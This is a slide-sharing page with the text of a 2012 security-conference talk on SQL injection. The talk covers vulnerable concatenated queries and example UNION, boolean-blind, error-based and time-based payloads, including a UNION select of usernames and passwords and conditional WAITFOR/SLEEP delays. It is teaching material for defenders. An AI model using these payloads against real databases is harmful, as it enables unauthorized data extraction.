Uploaded bymatt_presson
PPTX, PDF11,818 views

Time-Based Blind SQL Injection

The document provides an overview of SQL injection, focusing on its definition, categories, and various examples, including normal, blind, error-based, and time-based injections. It includes code snippets that demonstrate how SQL injections work and how they exploit vulnerabilities in databases. The presentation concludes with scenarios and demos related to time-based and blind SQL injection techniques.

Related topics:
Application Security
In this document
Powered by AI

Introduction to Time-Based Blind SQL Injection. The speaker is Matt Presson, a Security Analyst focusing on database security.

Introduction and definition of SQL Injection, which is a code insertion attack on databases. Sample vulnerable code demonstrates SQL Injection risks.

Categorization of SQL Injection into Normal, Blind, Error-based, and Time-based. Each type identified by its characteristics.

Examples showcasing Normal and Blind SQL Injection through specific SQL queries and injection techniques.

Demonstrates Error-Based SQL Injection examples for SQL Server and MySQL that utilize errors for data extraction.

Outlines Time-Based SQL Injection techniques, highlighting how delays can be used to confirm database vulnerabilities.

Discusses how Time-Based and Blind SQL Injection are similar and how they can be used to extract arbitrary data.

Introduces a scenario and upcoming demonstrations to reinforce understanding of SQL Injection techniques.

Downloaded 135 times
TIME-BASED BLIND SQL INJECTION Matt Presson (@matt_presson) Memphis ISSA November 2012
WHO AM I?  Sr. Information Security Analyst  Focus:  Application Security  Database Security  Mobile Security
OBJECTIVE  Quick introduction to SQL Injection  Four main types of SQL Injection  Time-based + Blind  A likely scenario  DEMOs
INTRO TO SQL INJECTION
DEFINITION “SQL injection is an attack in which malicious code is inserted into strings that are later passed to [a database] for parsing and execution.” “The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and executed.” Source: http://msdn.microsoft.com/en-us/library/ms161953(v=sql.105).aspx
SAMPLE VULNERABLE CODE var _shipCity = Request.form("ShipCity"); var sql = "select * from OrdersTable" + " where ShipCity = " + "'" + _shipCity + "'"; Source: http://msdn.microsoft.com/en-us/library/ms161953(v=sql.105).aspx
CATEGORIES OF SQL INJECTION  Normal  UNION queries  Blind  Boolean expressions  Error-based  Valid syntax that throws exceptions  Time-based  Resource intensive or sleep-style queries
EXAMPLES – NORMAL INJECTION var sql = "select ShipCity, Dest from Orders" + " where ShipCity = '"+_shipCity+"'"; Inject: ' UNION <data you want to extract> -- - Example: select ShipCity, Dest from Orders where ShipCity='' UNION select Username, Password from Users -- -'
EXAMPLES – BLIND INJECTION var sql = "select * from Orders" + " where ShipCity = '"+_shipCity+"'"; Inject: <valid value>' and <positive expression> <valid value>' and <negative expression> Example: select * from Orders where ShipCity='Memphis' and '1'='1'
EXAMPLES – ERROR-BASED INJECTION var sql = "select * from Orders" + " where ShipCity = '"+_shipCity+"'"; Example (SQL Server): select * from Orders where ShipCity='' and 1=CAST(suser_name() as INT)-- -' Example (MySQL): select * from Orders where ShipCity='' and ExtractValue(0,CONCAT(0x5c,(select user())))-- -'
EXAMPLES – TIME-BASED INJECTION var sql = "select ShipCity, Dest from Orders" + " where ShipCity = '"+_shipCity+"'"; Example (SQL Server): select ShipCity, Dest from Orders where ShipCity='' waitfor delay '0:0:10' Example (MySQL >= 5.0.12): select ShipCity, Dest from Orders where ShipCity='' UNION SELECT SLEEP(5), 2'
TIME-BASED + BLIND Same:  Resource intensive or sleep/wait style functions New:  Extract arbitrary data  Bypass business functionality
EXAMPLES – TIME-BASED + BLIND var sql = "select ShipCity, Dest from Orders" + " where ShipCity = '"+_shipCity+"'"; Example (SQL Server): select ShipCity, Dest from Orders where ShipCity=''; if(<boolean>) waitfor delay '0:0:10' Example (MySQL >= 5.0.12): select ShipCity, Dest from Orders where ShipCity='' UNION SELECT IF(<bool>,SLEEP(5),1), '2'
SCENARIO
DEMOS

More Related Content

PDF
Secure coding presentation Oct 3 2020
byMoataz Kamel
 
PDF
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
byAbraham Aranguren
 
PPTX
Introduction to Node.js
byVikash Singh
 
PPT
Phpunit testing
byNikunj Bhatnagar
 
PDF
Hacking Adobe Experience Manager sites
byMikhail Egorov
 
PDF
OAuth 2.0
byUwe Friedrichsen
 
PDF
introduction to Vue.js 3
byArezooKmn
 
PDF
How Sentry can help us with bugs
byErison Silva
 
Secure coding presentation Oct 3 2020
byMoataz Kamel
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
byAbraham Aranguren
 
Introduction to Node.js
byVikash Singh
 
Phpunit testing
byNikunj Bhatnagar
 
Hacking Adobe Experience Manager sites
byMikhail Egorov
 
OAuth 2.0
byUwe Friedrichsen
 
introduction to Vue.js 3
byArezooKmn
 
How Sentry can help us with bugs
byErison Silva
 

What's hot

PDF
Athenz + SPIFFE によるアクセス制御
byYahoo!デベロッパーネットワーク
 
PDF
Clean backends with NestJs
byAymene Bennour
 
PDF
OWASP API Security Top 10 - API World
by42Crunch
 
PDF
API Security Best Practices and Guidelines
byWSO2
 
PPTX
Host Header injection - Slides
byAmit Dubey
 
PPTX
Build RESTful API Using Express JS
byCakra Danu Sedayu
 
PPT
Javascript by geetanjali
byGeetanjali Bhosale
 
PPTX
포트폴리오에서 사용한 모던 C++
byKWANGIL KIM
 
PDF
Exception handling
byAnna Pietras
 
PPTX
Spring Boot and REST API
by07.pallav
 
PDF
Java- Datagram Socket class & Datagram Packet class
byRuchi Maurya
 
PDF
Angular Dependency Injection
byNir Kaufman
 
PDF
Angular
byLilia Sfaxi
 
PDF
Effective testing with pytest
byHector Canto
 
PDF
A Hacker's perspective on AEM applications security
byMikhail Egorov
 
PPTX
Django
bySayeed Far Ooqui
 
PDF
Android カスタムROMの作り方
byMasahiro Hidaka
 
PPTX
Java strings
byMohammed Sikander
 
PDF
Spring annotation
byRajiv Srivastava
 
PPS
Java rmi example program with code
bykamal kotecha
 
Athenz + SPIFFE によるアクセス制御
byYahoo!デベロッパーネットワーク
 
Clean backends with NestJs
byAymene Bennour
 
OWASP API Security Top 10 - API World
by42Crunch
 
API Security Best Practices and Guidelines
byWSO2
 
Host Header injection - Slides
byAmit Dubey
 
Build RESTful API Using Express JS
byCakra Danu Sedayu
 
Javascript by geetanjali
byGeetanjali Bhosale
 
포트폴리오에서 사용한 모던 C++
byKWANGIL KIM
 
Exception handling
byAnna Pietras
 
Spring Boot and REST API
by07.pallav
 
Java- Datagram Socket class & Datagram Packet class
byRuchi Maurya
 
Angular Dependency Injection
byNir Kaufman
 
Angular
byLilia Sfaxi
 
Effective testing with pytest
byHector Canto
 
A Hacker's perspective on AEM applications security
byMikhail Egorov
 
Django
bySayeed Far Ooqui
 
Android カスタムROMの作り方
byMasahiro Hidaka
 
Java strings
byMohammed Sikander
 
Spring annotation
byRajiv Srivastava
 
Java rmi example program with code
bykamal kotecha
 

Viewers also liked

PDF
Sql Injection Myths and Fallacies
byKarwin Software Solutions LLC
 
PPT
SQLMAP Tool Usage - A Heads Up
byMindfire Solutions
 
PPT
Time-Based Blind SQL Injection using Heavy Queries
byChema Alonso
 
PDF
SQL injection: Not Only AND 1=1 (updated)
byBernardo Damele A. G.
 
PDF
Time-Based Blind SQL Injection Using Heavy Queries
byChema Alonso
 
PPT
Sql injection attack
byRajKumar Rampelli
 
PDF
Sql injection 幼幼班
byhugo lu
 
PPTX
Sql injection
bySasha-Leigh Garret
 
DOCX
Types of sql injection attacks
byRespa Peter
 
PDF
Sql injection with sqlmap
byHerman Duarte
 
PPT
Les01 (retrieving data using the sql select statement)
byAchmad Solichin
 
PDF
SQL Injection
byAbhinav Nair
 
PPTX
Microsoft SQL Azure - Building Applications Using SQL Azure Presentation
byMicrosoft Private Cloud
 
PPTX
SQL Injection Attacks cs586
byStacy Watts
 
PPTX
Union based sql injection by Urdu Tutorials Point
byAl Zarqali
 
PDF
Normalisation student summary
bymary_ramsay
 
PDF
Practical Approach towards SQLi ppt
byAhamed Saleem
 
PPT
Blind SQL Injection - Optimization Techniques
byguest54de52
 
PDF
Advanced SQL injection to operating system full control (short version)
byBernardo Damele A. G.
 
PDF
ArchitectureDesignPatternsStoryV3
byAndrew Rea
 
Sql Injection Myths and Fallacies
byKarwin Software Solutions LLC
 
SQLMAP Tool Usage - A Heads Up
byMindfire Solutions
 
Time-Based Blind SQL Injection using Heavy Queries
byChema Alonso
 
SQL injection: Not Only AND 1=1 (updated)
byBernardo Damele A. G.
 
Time-Based Blind SQL Injection Using Heavy Queries
byChema Alonso
 
Sql injection attack
byRajKumar Rampelli
 
Sql injection 幼幼班
byhugo lu
 
Sql injection
bySasha-Leigh Garret
 
Types of sql injection attacks
byRespa Peter
 
Sql injection with sqlmap
byHerman Duarte
 
Les01 (retrieving data using the sql select statement)
byAchmad Solichin
 
SQL Injection
byAbhinav Nair
 
Microsoft SQL Azure - Building Applications Using SQL Azure Presentation
byMicrosoft Private Cloud
 
SQL Injection Attacks cs586
byStacy Watts
 
Union based sql injection by Urdu Tutorials Point
byAl Zarqali
 
Normalisation student summary
bymary_ramsay
 
Practical Approach towards SQLi ppt
byAhamed Saleem
 
Blind SQL Injection - Optimization Techniques
byguest54de52
 
Advanced SQL injection to operating system full control (short version)
byBernardo Damele A. G.
 
ArchitectureDesignPatternsStoryV3
byAndrew Rea
 

Similar to Time-Based Blind SQL Injection

PPT
Advanced Sql Injection ENG
byDmitry Evteev
 
PPT
Advanced SQL Injection
byamiable_indian
 
PPTX
SQL Injection attack
byRayudu Babu
 
PPTX
Sql injection
byNuruzzaman Milon
 
PPT
PHP - Introduction to Advanced SQL
byVibrant Technologies & Computers
 
PDF
SQL Injection Attack Guide for ethical hacking
byAyan Live Rourkela
 
PPTX
Sql Injection V.2
byTjylen Veselyj
 
PPT
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
byChema Alonso
 
PPTX
Understanding and preventing sql injection attacks
byKevin Kline
 
PPT
ShmooCon 2009 - (Re)Playing(Blind)Sql
byChema Alonso
 
PDF
Defcon 17-joseph mccray-adv-sql_injection
byAhmed AbdelSatar
 
PPTX
Sql injection
bySuraj Tiwari
 
PDF
Introduction to SQL Injections
byHaim Michael
 
PPTX
Sql injection
byIlan Mindel
 
PDF
SQL injection exploitation internals
byBernardo Damele A. G.
 
PPTX
SQL Injections - 2016 - Huntington Beach
byJeff Prom
 
PPT
How "·$% developers defeat the web vulnerability scanners
byChema Alonso
 
PDF
SQL Injection
byMagno Logan
 
PPSX
Web application security
bywww.netgains.org
 
PPT
Sql Injection Adv Owasp
byAung Khant
 
Advanced Sql Injection ENG
byDmitry Evteev
 
Advanced SQL Injection
byamiable_indian
 
SQL Injection attack
byRayudu Babu
 
Sql injection
byNuruzzaman Milon
 
PHP - Introduction to Advanced SQL
byVibrant Technologies & Computers
 
SQL Injection Attack Guide for ethical hacking
byAyan Live Rourkela
 
Sql Injection V.2
byTjylen Veselyj
 
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
byChema Alonso
 
Understanding and preventing sql injection attacks
byKevin Kline
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
byChema Alonso
 
Defcon 17-joseph mccray-adv-sql_injection
byAhmed AbdelSatar
 
Sql injection
bySuraj Tiwari
 
Introduction to SQL Injections
byHaim Michael
 
Sql injection
byIlan Mindel
 
SQL injection exploitation internals
byBernardo Damele A. G.
 
SQL Injections - 2016 - Huntington Beach
byJeff Prom
 
How "·$% developers defeat the web vulnerability scanners
byChema Alonso
 
SQL Injection
byMagno Logan
 
Web application security
bywww.netgains.org
 
Sql Injection Adv Owasp
byAung Khant
 

Time-Based Blind SQL Injection

  • 1.
    TIME-BASED BLIND SQLINJECTION Matt Presson (@matt_presson) Memphis ISSA November 2012
  • 2.
    WHO AM I? Sr. Information Security Analyst  Focus:  Application Security  Database Security  Mobile Security
  • 3.
    OBJECTIVE  Quick introductionto SQL Injection  Four main types of SQL Injection  Time-based + Blind  A likely scenario  DEMOs
  • 4.
    INTRO TO SQLINJECTION
  • 5.
    DEFINITION “SQL injection isan attack in which malicious code is inserted into strings that are later passed to [a database] for parsing and execution.” “The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and executed.” Source: http://msdn.microsoft.com/en-us/library/ms161953(v=sql.105).aspx
  • 6.
    SAMPLE VULNERABLE CODE var_shipCity = Request.form("ShipCity"); var sql = "select * from OrdersTable" + " where ShipCity = " + "'" + _shipCity + "'"; Source: http://msdn.microsoft.com/en-us/library/ms161953(v=sql.105).aspx
  • 7.
    CATEGORIES OF SQLINJECTION  Normal  UNION queries  Blind  Boolean expressions  Error-based  Valid syntax that throws exceptions  Time-based  Resource intensive or sleep-style queries
  • 8.
    EXAMPLES – NORMALINJECTION var sql = "select ShipCity, Dest from Orders" + " where ShipCity = '"+_shipCity+"'"; Inject: ' UNION <data you want to extract> -- - Example: select ShipCity, Dest from Orders where ShipCity='' UNION select Username, Password from Users -- -'
  • 9.
    EXAMPLES – BLINDINJECTION var sql = "select * from Orders" + " where ShipCity = '"+_shipCity+"'"; Inject: <valid value>' and <positive expression> <valid value>' and <negative expression> Example: select * from Orders where ShipCity='Memphis' and '1'='1'
  • 10.
    EXAMPLES – ERROR-BASEDINJECTION var sql = "select * from Orders" + " where ShipCity = '"+_shipCity+"'"; Example (SQL Server): select * from Orders where ShipCity='' and 1=CAST(suser_name() as INT)-- -' Example (MySQL): select * from Orders where ShipCity='' and ExtractValue(0,CONCAT(0x5c,(select user())))-- -'
  • 11.
    EXAMPLES – TIME-BASEDINJECTION var sql = "select ShipCity, Dest from Orders" + " where ShipCity = '"+_shipCity+"'"; Example (SQL Server): select ShipCity, Dest from Orders where ShipCity='' waitfor delay '0:0:10' Example (MySQL >= 5.0.12): select ShipCity, Dest from Orders where ShipCity='' UNION SELECT SLEEP(5), 2'
  • 12.
    TIME-BASED + BLIND Same:  Resource intensive or sleep/wait style functions New:  Extract arbitrary data  Bypass business functionality
  • 13.
    EXAMPLES – TIME-BASED+ BLIND var sql = "select ShipCity, Dest from Orders" + " where ShipCity = '"+_shipCity+"'"; Example (SQL Server): select ShipCity, Dest from Orders where ShipCity=''; if(<boolean>) waitfor delay '0:0:10' Example (MySQL >= 5.0.12): select ShipCity, Dest from Orders where ShipCity='' UNION SELECT IF(<bool>,SLEEP(5),1), '2'
  • 14.
  • 15.